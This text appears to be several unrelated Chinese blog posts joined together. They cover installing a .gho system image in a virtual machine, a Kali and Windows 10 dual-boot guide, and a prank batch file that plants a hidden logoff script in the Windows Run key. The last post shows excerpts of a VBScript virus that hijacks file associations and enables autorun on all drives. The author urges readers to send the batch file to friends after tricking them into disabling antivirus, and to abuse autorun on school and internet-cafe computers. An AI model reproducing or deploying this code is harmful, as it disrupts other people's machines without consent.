首先说一下，博主写这篇文章是因为博主在学习过程中恰好遇到了这个问题--如何将gho格式后缀的系统文件安装在空白的虚拟机上，并且最终解决了我的问题，所以在此小计一下。这时候系统文件是gho，没有安装菜单，不支持分区怎么办？那么看下面的方法，不需要iso虚拟机测试安装gho系统的方法.

还有一种情况是物理机安装了系统发现不对劲，怀疑是安装工具修改了系统，排查重装系统又太麻烦，就可以用虚拟机测试了.

准备工作：gho文件，DiskGenius，GhostExp，两个软件的下载地址：https://userscloud.com/lfbb6g8jv10m  http://pan.baidu.com/s/1eRcw5xC

大致步骤我说一下，其中一些不需需要改变的步骤我就不说了，需要注意的地方和重要的地方我会贴图，详情请看图：

自定义创建：

不需要加载光驱，选择稍后安装系统：

这里可选择创建的虚拟系统的版本，这里是选择XP：

虚拟系统保存目录选择，可自定义，但是一定要记得保存的路径：

创建完虚拟机后打开DG分区工具，打开虚拟硬盘文件，就是虚拟系统的文件：

看好了，别选错了，一般就是你命名以为vdmk之类的结尾的：

这里只是作为演示，我就知分了一个区，在实际使用中，可以根据自己的需求来分区，然后格式化：

然后打开虚拟机的磁盘管理，加载到物理机Z盘： 

选择虚拟机的C盘，去掉读写保护：

打开我的电脑就出现了Z盘：

然后用gho镜像浏览器打开gho系统镜像文件，全选，右键提取到Z盘：

切记--提取复制完后别忘了虚拟机磁盘管理取消共享的Z盘：

然后打开虚拟机电源启动虚拟系统，看见这个启动界面就是成功了..：如下图

以上是vm虚拟机安装测试系统的方法只用到了虚拟机和另外两个小工具，并没有用任何iso文件或者是什么PE系统....

掌握了这个方法以后遇到下载的gho就不用担心没法测试了.同时也方便大家在虚拟机安装gho格式的系统。不懂得可以评论留言，我看见了就会尽快回复。

今天打开虚拟机的xp系统准备crack某个软件的时候发现桌面上的一个noopen.bat，不假思索就打开了。。。心里想，虚拟机嘛，怕个毛。。双击后，没啥特别反应，就是个DOS提示框拒绝访问，但是重启机器后就一直关机重启0.0看来那个批处理生效了啊。。。

下面把代码贴出来：这是从网上看到的一个很简单的批处理：

@echo off
echo shutdown -l -t 0 >C:\WINDOWS\system32\system.bat
attrib C:\WINDOWS\system32\system.bat +s +h
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system /t REG_SZ /d C:\WINDOWS\system32\system.bat /f

怎么破呢，当然是F8进入安全模式了，找到自启的注册表键值，删掉就OK了：

从图上可以看出来，自启注册表键值system 对应的批处理位置，删掉就OK、话说这些都是在没杀毒软件的情况下，有杀毒软件或者是安装了还原软件之类的就不好使了。。。仅此作为饭后的笑谈或许都没意思。。。。

注：不信的自己在虚拟玩吧  你也可以发给你的朋友玩玩。但估计会被杀软干掉的。。。你可以欺骗他先关掉杀软的！嘿嘿 0.0 玩玩就好。

2017/02/02 更新:这篇文章是在BIOS+mbr的基础上写的,如果(你的easybcd不能用)是gpt+uefi 请查看这篇文章: 在UEFI+GPT下使用rEFind实现Win10 + Kali2.0 双引导:https://mrxn.net/Linux/UEFI-GPT-rEFind-Win10-Kali20.html

首先给大家看一下Kali2.0 i386和Windows10 X64安装成功后的截图吧:

从上图知道,我这里是使用Grub2引导的Windows系统.后面我会讲为什么这么做,比较适合新手.

首先说点需要注意的,你看看你是否遇到过这种情况，我把我安装的时候遇到的问题和群里童鞋们出现的问题综合了一下:

<一>镜像的选择:很多的人都是看自己的CPU来选择,比如Intel的使用i386.AMD的使用AMD64的.但是我用我的实践证明了,有的时候,AMD的CPU安装AMD版本的镜像是不行的,会卡在如下的界面,我想很多的人大概都遇到过.特别是使用AMD的CPU的童鞋.如果刻录了与你CPU型号相同的Kali镜像,但是却卡在如下图所示的环节,可以考虑重新刻录i386的镜像试试.因为哪个版本都可以使用的，只是性能上有多多少少的折扣。

<二>BIOS的设置，如果你是双显卡，安装的时候最好是使用集显，可以大大避免卡在安装界面进入后的第二步上。一般是在BIOS的config选项下面的Display里面设置使用集显还是双显卡。集显字样如：Intergrated Graphics 。等你安装完Kali之后，可以再进入BIOS设置重新启用双显卡。

<三>硬盘的模式选择，如果是安装双系统，推荐使用 AHCI + Legacy Only 模式，这样兼容性和性能都兼顾，但不是最好的性能哈，兼容和性能兼得，性能必然会有所牺牲的。如下图所示的硬盘模式设置：

<四>使用Windows系统自带的磁盘管理工具先压缩出来一部分给Kali 使用，一般推荐最少20G，可以大一点，比如30G比较合适。

在我的计算机上右键-管理-磁盘管理-选一个磁盘右键-压缩卷-输入压缩大小，比如：30720（30G），等待压缩完毕，退出来，关闭计算机，准备安装。

<五>如果你重新刻录镜像的时候不能够格式化U盘或者是U盘容量大小有问题，请查看这篇文章的解决方法：

使用Win32DiskImager做安装kali启动U盘后的那些事儿

下面开始详细的教程:

首先是使用windisk32这款软件来制作Kali的安装启动U盘.

选择你要安装的Kali版本镜像文件,我这里已Kali 2.0 i386做演示,也是我自己物理机安装的.记得在选择镜像的时候有个小细节，右下角的过滤选择所有文件类型：

，不然会出现你在你放镜像的文件夹下面找不到镜像。

找到镜像之后，打开就OK，然后是核对右边的Device（U盘/光盘）是否正确，软件默认是会选择U盘/光盘的，不知道的可以去我得电脑里面查看。这两项核对正确无误之后就可以点击下面的 write 开始写入镜像操作了。等待写入完成，一般是10分钟左右，主要依据你的U盘/光盘写入速度。

下面进入安装环节，关机，重启F12，到选择启动盘界面，或者是在BIOS设置好U盘为第一启动项(这不会就去百度吧，或者是别玩双系统了)：

在这个界面我们可以测试能够安装。选择第一项的  Live (686-pae)更具你自己刻录的镜像，括号里面的可能会有不同，比如  Live (adm64) 等，回车进入 Kali Live 界面，记载系统文件等等，速度很快，如果你的加载中途停止了，卡在如图所示的位置，那你可以考虑换镜像重新刻录尝试：

如果顺利，会进入Kali Live界面的。如下图所示：

如果进入这里了，就表明你可以成功安装Kali 的几率提升到95%了。当然，如果你在Windows上忘了压缩分区给Kali，别着急，这里也可以分使用parttion分区命令来分区的（推荐在Windows上分区好，对于新手比较方便，老鸟直接飞过吧）。具体的分区方法，这里就不叙述了，很多的。节省空间，这篇文章已经很长了。。。

OK，点击右上角的那个倒三角，在弹出来的菜单里，选择reboot，选择now。重启，重新进入U盘安装Kali界面。这里我选择install。如果顺利，就来到选择语言的对话框，通过方向键向上选择中文（简体）。

接着是询问是否要以选择的语言安装，通过Tab键选择 是。

选择区域：中国，回车

选择汉语，回车

就开始加载数据，准备进行下一步，等待这个过程完毕，一般很快，几秒钟

接着来到了 给主机命名，随便输入你喜欢的名字，比如：Mrxn

接着是域名，选择不填写吧。直接Tab键 选择  继续

接着是 输入root用户密码，可以在这里设置，也可以在后面设置，我就在这里设置了吧，root 然后Tab键切换到 继续 回车

然后来到 重新输入刚刚输入的root密码进行确认，root Tab键到 继续之后，回车

就到了，分区这一步，很重要的步骤，因为刚刚在Windows上压缩了一个空的分区，所以会出现第一个：向导-使用最大的连续空闲空间，所以我这里直接就选择这个，回车进行下一步。如果你没有提前分区，或者是项自己设置boot分区根分区/，hone分区等等，请自行选择下面的手动。新手就别去折腾了。。小心折腾坏两个系统。

接着来到选择是否把所有文件放到一个分区中，推荐新手选择这一个，然后 回车。

然后就是分区结束最后确认阶段，选择最后一个：分区设定结束开始将更改写入磁盘，然后回车进行下一个环节

如果你是选择手动分区，并且自己选择了分区，就会弹出下面这两个对话框，我这里不是手动分区，所以不会出现这个，这只坐介绍，

接着是格式化分区的步骤，手动和向导分区都有这一步

格式化结束就会开始安装系统了，复制系统文件到磁盘了

漫长的等待数据复制完成之后，就会弹出选择是否进行网络安装，直接选择否，因为还没有修改源，会很慢，等死你。。。

接下来就是非常重要的步骤：安装Grub到那个分区，我这里选择是，安装到主mbr上，利用Grub来引导Windows。如果你想让Windows来引导Kali就选择否，然后选择将Grub安装到那个分区，如果/boot单独分区则添/boot所在的分区，如果/boot没有单独分区，则添/目录所在的分区；

Grub安装完毕之后就是重启，重启之后就可以看见熟悉的Kali Grub引导菜单，选择Kali 进入，进入Kali之后，我们需要使用下面的命令来更新Grub引导使Windows引导加入到引导菜单里面，打开终端命令面板，输入如下的命令更新Grub：

su

sudo update Grub2

如果你是以root登录的系统，直接输入 update Grub2  就可以了。然后reboot，就会发现已经有Windows load （sda1）等字样，选择并回车，就可以进入Windows系统了。如果不能进去Windows系统，请使U启动，大白菜，老毛桃之类的PE工具进行引导修复，就OK了。修复之后需要在Windows使用easybcd添加Kali 启动项。

如果是将mbr安装到其他分区，并非主分区，那么重启后是进入Windows系统的，进入Windows系统之后，下载easybcd，添加Kali启动项。具体的教程，可以百度搜搜，很多，也很详细的。

至此Kali + windows双系统安装就结束了，如果在安装中有什么问题或者是我写的不对的地方，欢迎大家评论留言：https://mrxn.net/guestbook.html或者是加我QQ-1451657099讨论。欢迎大家去折腾，生命在于折腾。生命不息，折腾不止！come on！

欢迎转载，请注明出处：https://mrxn.net/?post=363 毕竟写这么久不容易，请相互尊重，谢谢。

今天和朋友聊天中，聊到HTA，说让我学习一下，我就去百度搜素了一下，就在搜索结果中发现了暴风一号病毒，由于对病毒感兴趣，就点击进去了，看了它的介绍和威力，就估摸着下载一份源码来看看，于是Download......以下是我在源码中发现的好东西：

1.病毒会删除HKCR\lnkfile\IsShortcut键值，使快捷方式的图标上叠加的小箭头消失。

博主亲测效果图：

看起来爽很多是不是！你也可以，删除上图中→_→右边黄色的IsShortcut项 。重启电脑即可看到效果。^_^

-------这是源码部分截图

2.修改inf,bat,cmd,reg,chm,hlp,txt文件关联：

 If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/cmdfile/shell/open/command/")<>File_Value Then
        Call SetCmdFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/")<>File_Value Then
        Call SetRegFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/")<>File_Value Then
        Call SetchmFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/")<>File_Value Then
        Call SethlpFileAss(VirusAssPath)
    End If  

           至于这个嘛，我们可以用来修复文件关联错误。比如有时候我们打开EXE或者是上面的inf,bat,cmd,reg,chm,hlp,txt ，

当然你也可以用来关联你想关联的。嘿嘿   自由发挥！

3.开启所有磁盘的自动运行特性：

Sub RegSet()
    On Error Resume Next
    Dim RegPath1 , RegPath2, RegPath3, RegPath4
    RegPath1="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/NOHIDDEN/CheckedValue"
    RegPath2="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue"
    RegPath3="HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDriveTypeAutoRun"
    RegPath4="HKEY_CLASSES_ROOT/lnkfile/IsShortcut"
    Call WriteReg (RegPath1, 3, "REG_DWORD")
    Call WriteReg (RegPath2, 2, "REG_DWORD")
    Call WriteReg (RegPath3, 0, "REG_DWORD")
    Call DeleteReg (RegPath4)
End Sub  

      这个我们可以利用啊！特别是对于网吧，学校这种公共场所的电脑，让它自动运行你的软甲你。O(∩_∩)O哈哈~

算了不说了，估计很多看客就知道第一种 修改桌面图图标上的小鼠标吧！

下面贴出真个病毒的源代码加注释：需要的自行研究，病毒都是宝贝啊，都是编程中的精品！